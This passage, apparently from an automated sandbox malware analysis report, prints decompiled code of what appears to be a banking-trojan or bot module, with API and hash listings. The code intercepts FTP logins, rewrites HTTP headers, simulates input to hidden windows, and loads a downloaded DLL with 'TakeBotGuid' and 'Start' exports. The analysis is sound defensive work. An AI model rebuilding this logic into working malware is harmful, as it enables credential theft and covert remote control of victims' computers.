    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t89 == 0 || _t89 == _t97) {
    										goto L51;
    									} else {
    										_t73 = L012B1140(_t81, _t89);
    										if(_t73 == 0) {
    											goto L51;
    										} else {
    											 *((char*)(_t99 + 0x73)) = 0;
    											EnterCriticalSection(0x12dd050);
    											_t98 = E012C3F58( *((intOrPtr*)(_t99 + 0x7c)));
    											if(_t98 != 0) {
    												L18:
    												 *((char*)(_t99 + 0x73)) = 1;
    												if( *_t91 != 0x55) {
    													L012B1933( *((intOrPtr*)(_t98 + 8)));
    													 *((intOrPtr*)(_t98 + 8)) = _t73;
    												} else {
    													E012C3FF9(_t98, 1);
    													 *((intOrPtr*)(_t98 + 4)) = _t73;
    												}
    												 *_t98 =  *((intOrPtr*)(_t99 + 0x7c));
    											} else {
    												_t98 = E012C3F91( *((intOrPtr*)(_t99 + 0x7c)));
    												if(_t98 != 0) {
    													goto L18;
    												} else {
    													L012B1933(_t73);
    												}
    											}
    											_t71 =  *((intOrPtr*)(_t99 + 0x73));
    											L23:
    											LeaveCriticalSection(0x12dd050);
    											_t39 = _t71;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t39;
    			}

























    APIs
    • EnterCriticalSection.KERNEL32(012DD050), ref: 012C4107
    • LeaveCriticalSection.KERNEL32(012DD050,000000FF), ref: 012C4161
    • EnterCriticalSection.KERNEL32(012DD050), ref: 012C417C
    • getpeername.WS2_32(000000FF,?,?), ref: 012C421F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$Enter$Leavegetpeername
    • String ID: FEAT$LIST$PASS$PASV$STAT$TYPE$USER
    • API String ID: 1099368488-1452479446
    • Opcode ID: c2ad7fd8076994906a13415a9cc8090e580ae54ba6288029cf5d88d9618c47a7
    • Instruction ID: 379bb1993550bac34e8f97651036f007f0e0c178b6703d6b0db04dd1f04fa255
    • Opcode Fuzzy Hash: c2ad7fd8076994906a13415a9cc8090e580ae54ba6288029cf5d88d9618c47a7
    • Instruction Fuzzy Hash: 735139316B02CB8AEF31AA68D8A57EF7BA2AB51F00F14871EDBA447091D771D445C742
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E012C72D8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				signed int _v88;
    				char _v92;
    				void* __esi;
    				signed int _t112;
    				signed int _t113;
    				signed int _t115;
    				void* _t117;
    				signed int _t121;
    				signed int _t123;
    				signed int _t126;
    				signed int _t129;
    				signed char _t130;
    				signed char _t135;
    				intOrPtr _t146;
    				signed int _t161;
    				void* _t169;
    				void* _t191;
    				intOrPtr _t192;
    				signed int _t201;
    				void* _t203;
    				void* _t205;
    				signed int _t214;
    
    				if(L012B150A() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					return  *0x12dd2d4(_a4, _a8, _a12);
    				} else {
    					EnterCriticalSection(0x12dd2e4);
    					_t207 = _a4;
    					_t201 = E012C63A9(_a4);
    					_v16 = _t201;
    					if(_t201 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x12dd2e4);
    						goto L9;
    					}
    					_t203 = _t201 * 0x38 +  *0x12dd300;
    					if( *((intOrPtr*)(_t203 + 0x20)) > 0) {
    						L30:
    						_t112 =  *(_t203 + 0x24);
    						_t205 =  *((intOrPtr*)(_t203 + 0x20)) - _t112;
    						LeaveCriticalSection(0x12dd2e4);
    						_t210 = _a4;
    						_t113 =  *0x12dd2d4(_a4,  *(_t203 + 0x1c) + _t112, _t205);
    						_v8 = _t113;
    						__eflags = _t113 - 0xffffffff;
    						if(_t113 != 0xffffffff) {
    							EnterCriticalSection(0x12dd2e4);
    							_t115 = E012C63A9(_t210);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t161 = _v8;
    								_t117 = _t115 * 0x38 +  *0x12dd300;
    								__eflags = _t161 - _t205;
    								if(_t161 != _t205) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t161;
    									_t90 = _t117 + 0x28;
    									 *_t90 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t90;
    									_v8 = 1;
    								} else {
    									_t86 = _t117 + 0x1c; // -19780324
    									_t211 = _t86;
    									_v8 =  *(_t117 + 0x28);
    									L012B1933( *_t86);
    									_t191 = 0x10;
    									L012B19F6(_t211, _t191);
    								}
    							} else {
    								_v8 = _v8 | _t115;
    								 *0x12dd2e0(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x12dd2e4);
    						}
    						return _v8;
    					}
    					if( *(_t203 + 8) > 0) {
    						L39:
    						LeaveCriticalSection(0x12dd2e4);
    						_t212 = _a4;
    						_t121 =  *0x12dd2d4(_a4, _a8, _a12);
    						_v12 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x12dd2e4);
    							_t123 = E012C63A9(_t212);
    							__eflags = _t123 - 0xffffffff;
    							if(_t123 != 0xffffffff) {
    								_t169 = _t123 * 0x38 +  *0x12dd300;
    								_t192 =  *((intOrPtr*)(_t169 + 8));
    								__eflags = _v12 - _t192;
    								if(_v12 > _t192) {
    									E012C6467(_t123);
    								} else {
    									 *((intOrPtr*)(_t169 + 8)) = _t192 - _v12;
    								}
    							} else {
    								_v12 = _v12 | _t123;
    								 *0x12dd2e0(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x12dd2e4);
    						}
    						return _v12;
    					}
    					_t213 =  &_v92;
    					_t126 = E012C6886( &_v92, _t207, _a8, _a12);
    					_v20 = _t126;
    					if(_t126 != 0xffffffff) {
    						_t214 = 0;
    						__eflags = _v88;
    						if(_v88 == 0) {
    							L38:
    							L012B114A( &_v92);
    							_t129 = _v20 + _a12;
    							__eflags = _t129;
    							 *(_t203 + 8) = _t129;
    							goto L39;
    						}
    						_t130 = L012B132A( &_v92);
    						_v16 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) != 0) {
    							L012B114A( &_v92);
    							LeaveCriticalSection(0x12dd2e4);
    							return  *0x12dd2e0(0xffffe8a3, 0) | 0xffffffff;
    						}
    						_v8 = _v8 & 0;
    						_v12 = 0;
    						__eflags = _t130 & 0x00000002;
    						if((_t130 & 0x00000002) != 0) {
    							_t214 = L012B142E(_a8, _a12);
    							_v12 = _t214;
    							__eflags = _t214;
    							if(_t214 != 0) {
    								L012B1A64( *((intOrPtr*)(_t203 + 0xc)),  *((intOrPtr*)(_t203 + 0x10)));
    								L012B1933( *(_t203 + 0x14));
    								L012B1933( *((intOrPtr*)(_t203 + 4)));
    								_t146 = L012B12A8(_v84, _v80);
    								 *(_t203 + 0x14) =  *(_t203 + 0x14) & 0x00000000;
    								_t40 = _t203 + 0x18;
    								 *_t40 =  *(_t203 + 0x18) & 0x00000000;
    								__eflags =  *_t40;
    								 *((intOrPtr*)(_t203 + 4)) = _t146;
    								 *((intOrPtr*)(_t203 + 0xc)) = _v36;
    								 *((intOrPtr*)(_t203 + 0x10)) = _v32;
    								_v8 = L012B1177(_t214, L012B1177(_t214, L012B195B(_t214, _a12, "Accept-Encoding", "identity"), "TE"), "If-Modified-Since");
    							} else {
    								L012B1A64(_v36, _v32);
    							}
    						}
    						__eflags = _v16 & 0x00000004;
    						if((_v16 & 0x00000004) == 0) {
    							L28:
    							__eflags = _t214;
    							if(_t214 == 0) {
    								goto L38;
    							}
    							L012B114A( &_v92);
    							_t69 = _t203 + 0x24;
    							 *_t69 =  *(_t203 + 0x24) & 0x00000000;
    							__eflags =  *_t69;
    							 *(_t203 + 8) = _v20;
    							 *((intOrPtr*)(_t203 + 0x20)) = _v8;
    							 *(_t203 + 0x1c) = _t214;
    							 *(_t203 + 0x28) = _a12;
    							goto L30;
    						}
    						__eflags = _t214;
    						if(__eflags != 0) {
    							_t135 = _v8;
    						} else {
    							_t214 = _a8;
    							_t135 = _a12;
    						}
    						_v16 = _t135;
    						_v8 = E012C6B7C(_v16, __eflags, _t214, _v56, _v52,  &_v12);
    						L012B1933(_v56);
    						__eflags = _v8;
    						if(_v8 != 0) {
    							__eflags = _t214 - _a8;
    							if(_t214 != _a8) {
    								L012B1933(_t214);
    							}
    							_t214 = _v12;
    						} else {
    							__eflags = _t214 - _a8;
    							if(_t214 == _a8) {
    								goto L38;
    							}
    							_v8 = _v16;
    						}
    						goto L28;
    					} else {
    						E012C6467(_v16);
    						L012B114A(_t213);
    						goto L8;
    					}
    				}
    			}




































    APIs
    • EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C72FC
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7358
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7398
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C74E3
    • EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C7501
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C755F
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C7585
    • EnterCriticalSection.KERNEL32(012DD2E4), ref: 012C75A3
    • LeaveCriticalSection.KERNEL32(012DD2E4), ref: 012C75E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$Leave$Enter
    • String ID: Accept-Encoding$If-Modified-Since$identity
    • API String ID: 2978645861-3034467039
    • Opcode ID: b3afaa577a0c394e968bf8db978f65d885666a0e2710c67c14c65e1a1b56613d
    • Instruction ID: 8786180c4c6b8caf9902a44bffdd0173d49ec6042b7b709ec6b932e1d38ed43b
    • Opcode Fuzzy Hash: b3afaa577a0c394e968bf8db978f65d885666a0e2710c67c14c65e1a1b56613d
    • Instruction Fuzzy Hash: 32A1D671D2160AEFCF14DFA4E8859ADBB74FF14760F108619EA15A7390DB30AA51CF80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CEDF6(void** __esi, char _a4) {
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __esi;
    				_t15 = __esi[7];
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t16 = _t41[3];
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t17 = _t41[1];
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t18 = _t41[5];
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t19 = _t41[4];
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t21 = _t41[0x56];
    					if(_t21 != 0) {
    						SelectObject(_t41[0x55], _t21);
    					}
    					_t22 = _t41[0x57];
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t23 = _t41[0x55];
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t24 = _t41[0x58];
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t25 = _t41[0x60];
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
    					}
    					_t14 =  &(_t41[0x5f]); // 0x12dd9b4
    					return L012B11D1(_t14);
    				}
    				return _t20;
    			}

    APIs
    • DeleteObject.GDI32(?), ref: 012CEE06
    • CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE16
    • TlsFree.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE21
    • CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE2F
    • UnmapViewOfFile.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE39
    • CloseHandle.KERNEL32(?,?,?,012CF039,00000000,?,0000004C,00000000), ref: 012CEE46
    • SelectObject.GDI32(?,?), ref: 012CEE60
    • DeleteObject.GDI32(?), ref: 012CEE71
    • DeleteDC.GDI32(?), ref: 012CEE7E
    • CloseHandle.KERNEL32(?,?,?,012CF039,00000000), ref: 012CEE8F
    • WaitForSingleObject.KERNEL32(?,00000000,?,?,012CF039,00000000), ref: 012CEE9E
    • PostThreadMessageW.USER32 ref: 012CEEB7
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: e6213e4f11c971011d85ebc3ce02650baf9af4ded6c28750c40e63b73dc5d982
    • Instruction ID: 3671b664bb2d8d62dd099dfd25d19673032a496fd7c95c639c7ebf4e8defa503
    • Opcode Fuzzy Hash: e6213e4f11c971011d85ebc3ce02650baf9af4ded6c28750c40e63b73dc5d982
    • Instruction Fuzzy Hash: 7A21FA71610702ABEA309A79DC8CB97BBECAF54BA1F06491CE756D7190DB34E4408B24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 35%
    			E012CD4FF(void* __ecx, signed int __edx, signed int _a4, long _a8, signed short _a12) {
    				struct HWND__* _v8;
    				char _v12;
    				signed int _v16;
    				struct HWND__* _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed char _v36;
    				intOrPtr _v72;
    				struct tagWINDOWINFO _v96;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t102;
    				struct HWND__* _t103;
    				signed int _t107;
    				signed int _t108;
    				struct HWND__* _t133;
    				long _t136;
    				struct HWND__* _t161;
    				long _t162;
    				void* _t165;
    
    				_t165 = __ecx;
    				_t102 =  *((intOrPtr*)(__ecx + 0x10));
    				_t132 = __edx;
    				_v16 = __edx;
    				_v20 = 0;
    				if( *((intOrPtr*)(_t102 + 0x110)) == 0) {
    					_t103 =  *((intOrPtr*)(_t102 + 0x108));
    					_v20 = _t103;
    					if(_t103 != 0) {
    						_v36 = L012B167C(_t103, __ecx, 0, 0) & 0x0000ffff;
    					} else {
    						_v36 = 0;
    					}
    				} else {
    					if((__edx & 0x00000001) != 0) {
    						E012CD071(_a8, _a4, __ecx);
    						_t132 = __edx & 0xfffffffe;
    						_v16 = _t132;
    					}
    					if((_t132 & 0x00000004) != 0) {
    						E012CD002(0, _t165, 0, 0, 1);
    						_t132 = _v16;
    					}
    				}
    				 *( *(_t165 + 0x10) + 0x100) = _a4;
    				_t107 =  *(_t165 + 0x10);
    				 *((intOrPtr*)(_t107 + 0x104)) = _a8;
    				if(_t132 == 0) {
    					L68:
    					return _t107;
    				}
    				_v24 = _t132;
    				_t24 =  &_v24;
    				 *_t24 = _v24 & 0x00000002;
    				if( *_t24 == 0) {
    					if((_t132 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					_t107 = L012B167C(_t107, _t165, 1);
    					L14:
    					_v28 = _t132;
    					_t29 =  &_v28;
    					 *_t29 = _v28 & 0x00000020;
    					if( *_t29 == 0) {
    						if((_t132 & 0x00000040) == 0) {
    							L19:
    							_v32 = _t132;
    							_t34 =  &_v32;
    							 *_t34 = _v32 & 0x00000008;
    							if( *_t34 == 0) {
    								if((_t132 & 0x00000010) == 0) {
    									L24:
    									_t108 =  *(_t165 + 0x10);
    									_push( *((intOrPtr*)(_t108 + 0x104)));
    									_push( *((intOrPtr*)(_t108 + 0x100)));
    									_t143 = 0x64;
    									_t161 = L012B1889(_t143,  &_v12);
    									_t107 = _v12 + 0xfffffff6;
    									_v8 = _t161;
    									if(_t107 <= 7) {
    										_t107 = GetWindowLongW(_t161, 0xfffffff0);
    										if((_t107 & 0x40000000) != 0) {
    											_t143 = _t107;
    											_t107 = L012B18BB(_t107);
    											if(_t107 == 0) {
    												_t107 = GetParent(_t161);
    												if(_t107 != 0) {
    													_v8 = _t107;
    													_t161 = _t107;
    												}
    											}
    										}
    									}
    									if(_t161 == 0) {
    										L34:
    										_t133 = _v20;
    										if(_t133 != 0) {
    											_t107 = IsWindow(_t133);
    											if(_t107 == 0 || _t161 != 0 && _t133 != _t161 && (_v36 & 0x00000007) == 0) {
    												if(_v16 != 0x8001) {
    													_t107 = E012CD002(0, _t165, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t133;
    												_v12 = 1;
    												_t161 = _t133;
    											}
    										}
    										goto L42;
    									} else {
    										_t143 = _t161;
    										_t107 = L012B1956(_t161);
    										if((_t107 & 0x00000040) == 0) {
    											goto L34;
    										}
    										if(_t161 != _v20) {
    											_t107 = E012CD002(_t161, _t165, GetWindowThreadProcessId(_t161, 0), 0, 1);
    										}
    										_v12 = 1;
    										L42:
    										if(_t161 == 0) {
    											goto L68;
    										}
    										_v96.cbSize = 0x3c;
    										_t107 = GetWindowInfo(_t161,  &_v96);
    										if(_t107 == 0) {
    											goto L68;
    										}
    										_t107 = _a4 & 0x0000ffff;
    										_t136 = (_a8 & 0x0000ffff) << 0x00000010 | _t107;
    										if(_v12 != 1) {
    											_t162 = _a8;
    										} else {
    											_t143 = _t161;
    											_t107 = L012B1956(_t161);
    											if((_t107 & 0x00000020) == 0) {
    												_t107 = _a4 - _v96.rcClient & 0x0000ffff;
    												_t162 = (_a8 - _v72 & 0x0000ffff) << 0x00000010 | _t107;
    											} else {
    												_t162 = _t136;
    											}
    										}
    										if(_v24 == 0) {
    											if((_v16 & 0x00000004) == 0) {
    												goto L54;
    											}
    											_push(_t136);
    											_push(_t162);
    											_push(0xa2);
    											_push(0x202);
    											goto L53;
    										} else {
    											_push(_t136);
    											_push(_t162);
    											_push(0xa1);
    											_push(0x201);
    											L53:
    											_push(_v12);
    											_push( &_v96);
    											_push(_v8);
    											_t107 = E012CD271(_t165, _t143);
    											L54:
    											if(_v28 == 0) {
    												if((_v16 & 0x00000040) == 0) {
    													L59:
    													if(_v32 == 0) {
    														if((_v16 & 0x00000010) == 0) {
    															L64:
    															if((_v16 & 0x00000001) != 0) {
    																_t107 = E012CD271(_t165, _t143, _v8,  &_v96, _v12, 0x200, 0xa0, _t162, _t136);
    															}
    															if((_v16 & 0x00000800) == 0) {
    																goto L68;
    															} else {
    																return PostMessageW(_v8, 0x20a, (_a12 & 0x0000ffff) << 0x00000010 | L012B167C(_t107, _t165, 0, 0) & 0x0000ffff, _t136);
    															}
    														}
    														_push(_t136);
    														_push(_t162);
    														_push(0xa5);
    														_push(0x205);
    														L63:
    														_push(_v12);
    														_push( &_v96);
    														_push(_v8);
    														_t107 = E012CD271(_t165, _t143);
    														goto L64;
    													}
    													_push(_t136);
    													_push(_t162);
    													_push(0xa4);
    													_push(0x204);
    													goto L63;
    												}
    												_push(_t136);
    												_push(_t162);
    												_push(0xa8);
    												_push(0x208);
    												L58:
    												_push(_v12);
    												_push( &_v96);
    												_push(_v8);
    												_t107 = E012CD271(_t165, _t143);
    												goto L59;
    											}
    											_push(_t136);
    											_push(_t162);
    											_push(0xa7);
    											_push(0x207);
    											goto L58;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								L012B167C(_t107, _t165, 2);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						_t107 = L012B167C(_t107, _t165, 4);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 012CD60E
    • GetParent.USER32(00000000), ref: 012CD627
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD64D
    • IsWindow.USER32(?), ref: 012CD670
      • Part of subcall function 012CD071: WaitForSingleObject.KERNEL32(?,000000FF), ref: 012CD085
      • Part of subcall function 012CD071: ReleaseMutex.KERNEL32(?), ref: 012CD0A4
      • Part of subcall function 012CD071: GetWindowRect.USER32 ref: 012CD0B1
      • Part of subcall function 012CD071: IsRectEmpty.USER32(?), ref: 012CD135
      • Part of subcall function 012CD071: GetWindowLongW.USER32(?,000000F0), ref: 012CD144
      • Part of subcall function 012CD071: GetParent.USER32(?), ref: 012CD15A
      • Part of subcall function 012CD071: MapWindowPoints.USER32 ref: 012CD163
      • Part of subcall function 012CD071: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 012CD187
    • GetWindowInfo.USER32 ref: 012CD6C0
    • PostMessageW.USER32(?,0000020A,?,?), ref: 012CD7FE
      • Part of subcall function 012CD002: WaitForSingleObject.KERNEL32(?,000000FF,762EA660,012CD43B,00000000), ref: 012CD008
      • Part of subcall function 012CD002: ReleaseMutex.KERNEL32(?), ref: 012CD03C
      • Part of subcall function 012CD002: IsWindow.USER32(?), ref: 012CD043
      • Part of subcall function 012CD002: PostMessageW.USER32(?,00000215,00000000,?), ref: 012CD05D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: a6757ed227a503d2388feffc6c97ba1c41017f838f2cb741567fbc5d092424e4
    • Instruction ID: b680e76f5effa5d2ddcdad308ab9fdea5440e69231fc2424c38041b20632f788
    • Opcode Fuzzy Hash: a6757ed227a503d2388feffc6c97ba1c41017f838f2cb741567fbc5d092424e4
    • Instruction Fuzzy Hash: 7A91F470A2030EAFEB219ED8D889FBE7BB5AF50F44F14422DEB14661D0C7B49945CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E012C1AC1(intOrPtr __ecx, void* __eflags) {
    				void* __ebx;
    				void* __edi;
    				void* _t43;
    				struct HINSTANCE__* _t45;
    				_Unknown_base(*)()* _t48;
    				intOrPtr _t64;
    				void* _t107;
    				WCHAR* _t120;
    				intOrPtr _t123;
    				void* _t124;
    				void* _t126;
    				intOrPtr* _t127;
    				struct HINSTANCE__* _t130;
    				struct HINSTANCE__* _t133;
    
    				_t124 = _t126 - 0x78;
    				_t127 = _t126 - 0x270;
    				 *((intOrPtr*)(_t124 + 0x6c)) = __ecx;
    				L012B1721(0, _t124 + 0x60);
    				L012B164F(_t124 - 0x10, 0x12d76a4, 2);
    				L012B101E(_t124 - 0x10, 2);
    				L012B101E(_t124 - 0x10, 8);
    				_t130 =  *0x12dc758; // 0x0
    				if(_t130 == 0) {
    					_t120 = L012B175D(0xff);
    					 *(_t124 + 0x70) = _t120;
    					L012B15E6(1, _t120);
    					_t107 = 0x5c;
    					 *((short*)(L012B1ABE(_t120, _t107) + 2)) = 0;
    					_t43 = L012B18B6(_t124 - 0x10);
    					_t108 = _t124 - 0x10;
    					L012B101E(_t120, _t43);
    					_t45 = LoadLibraryW(_t120);
    					 *0x12dc758 = _t45;
    					_t131 = _t45;
    					if(_t45 != 0) {
    						L5:
    						L012B11AE(_t124 - 0x1f8);
    						 *(_t124 + 0x74) = L012B1195(_t124 - 0x1f4, _t108 | 0xffffffff);
    						_t48 = GetProcAddress( *0x12dc758, "TakeBotGuid");
    						 *0x12dc780 = _t48;
    						 *_t48();
    						 *_t127 = "Init";
    						 *0x12dc76c = GetProcAddress( *0x12dc758,  *(_t124 + 0x74));
    						 *0x12dc794 = GetProcAddress( *0x12dc758, "Start");
    						 *0x12dc7ac = 0;
    						 *0x12dc7a8 = L012B175D(0xff);
    						L012B1A19(_t52,  *((intOrPtr*)(_t124 + 0x6c)), 0xffffffff);
    						CreateThread(0, 0, E012C0F66, 0, 0, 0);
    					} else {
    						 *(_t124 + 0x64) = L012B175D(0x30d40);
    						_t123 = L012B175D(0xff);
    						L012B1A19(_t123,  *((intOrPtr*)(_t124 + 0x6c)), 0xffffffff);
    						 *((char*)(L012B161D(_t123, 0x2f) + 1)) = 0;
    						L012B1951(_t123, 2);
    						 *(_t124 + 0x74) = L012B1195(_t124 - 0x10, "l/" | 0xffffffff);
    						L012B1951(_t123, L012B1BE0(_t60));
    						L012B12A3(_t124 + 0x30, _t131);
    						_t64 =  *0x12dcc54; // 0x0
    						_t108 = _t124 + 0x64;
    						 *((intOrPtr*)(_t124 + 0x38)) = _t64;
    						 *((intOrPtr*)(_t124 + 0x40)) = _t123;
    						 *((intOrPtr*)(_t124 + 0x58)) = 0x12d000;
    						if(L012B1690(0, _t124 + 0x30, _t124 + 0x64, 0xff) != 0) {
    							_t108 =  *(_t124 + 0x64);
    							L012B14A1( *(_t124 + 0x70),  *(_t124 + 0x64),  *((intOrPtr*)(_t124 + 0x68)));
    							 *0x12dc758 = LoadLibraryW( *(_t124 + 0x70));
    						}
    						L012B1933( *(_t124 + 0x64));
    						L012B1933( *(_t124 + 0x70));
    						_t133 =  *0x12dc758; // 0x0
    						if(_t133 != 0) {
    							goto L5;
    						}
    					}
    				}
    				return 0;
    			}

    APIs
    • LoadLibraryW.KERNEL32(00000000,00000000,?,?,00000008,00000002,00000002), ref: 012C1B54
    • LoadLibraryW.KERNEL32(?,?,00000000,00000002,000000FF,?,?,00000008,00000002,00000002), ref: 012C1BFD
    • GetProcAddress.KERNEL32(TakeBotGuid), ref: 012C1C51
    • GetProcAddress.KERNEL32 ref: 012C1C6A
    • GetProcAddress.KERNEL32(Start), ref: 012C1C7C
    • CreateThread.KERNEL32 ref: 012C1CAB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
